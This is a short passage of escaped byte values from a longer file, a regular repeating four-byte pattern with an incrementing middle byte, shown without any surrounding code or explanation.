x01Z\x8e\x90\x01Z\x8f\x90\x01Z\x90\x90\x01Z\x91\x90\x01Z\x92\x90\x01Z\x93\x90\x01Z\x94\x90\x01Z\x95\x90\x01Z\x96\x90\x01Z\x97\x90\x01Z\x98\x90\x01Z\x99\x90\x01Z\x9a\x90\x01Z\x9b\x90\x01Z\x9c\x90\x01Z\x9d\x90\x01Z\x9e\x90\x01Z\x9f\
